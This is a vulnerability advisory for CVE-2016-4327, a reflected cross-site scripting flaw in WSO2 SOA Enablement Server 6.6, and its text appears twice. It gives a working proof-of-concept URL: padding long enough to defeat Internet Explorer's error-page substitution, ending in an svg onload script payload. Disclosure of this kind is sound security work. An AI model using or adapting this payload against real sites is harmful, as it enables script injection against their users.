WSO2 SOA Enablement Server - Reflected Cross-Site Scripting May 17 2016 06:17PM Etnies (kuba25101990 gmail com)Title: WSO2 SOA Enablement Server - Reflected Cross-Site ScriptingAuthors: Jakub Palaczynski, Lukasz JuszczykDate: 08. April 2016CVE: CVE-2016-4327Affected Software:==================WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616Probably other versions are also vulnerable.Proof of Concept:=================PoC works only in IE browser - path is reflected in the response andneeds to be long enough to bypass IE's 404 page substitution:https://host:6443/xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssg/onload=alert(document.domain)>Patch:======Vendor has aleady released patch for this issue.[ reply ]from SecurityFocus Vulnerabilities http://ift.tt/1TlLwXJ
Title: WSO2 SOA Enablement Server - Reflected Cross-Site Scripting
Authors: Jakub Palaczynski, Lukasz Juszczyk
Date: 08. April 2016
CVE: CVE-2016-4327
Affected Software:
==================
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616
Probably other versions are also vulnerable.
Proof of Concept:
=================
PoC works only in IE browser - path is reflected in the response and
needs to be long enough to bypass IE's 404 page substitution:
https://host:6443/xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
g/onload=alert(document.domain)>
Patch:
======
Vendor has aleady released patch for this issue.
[ reply ]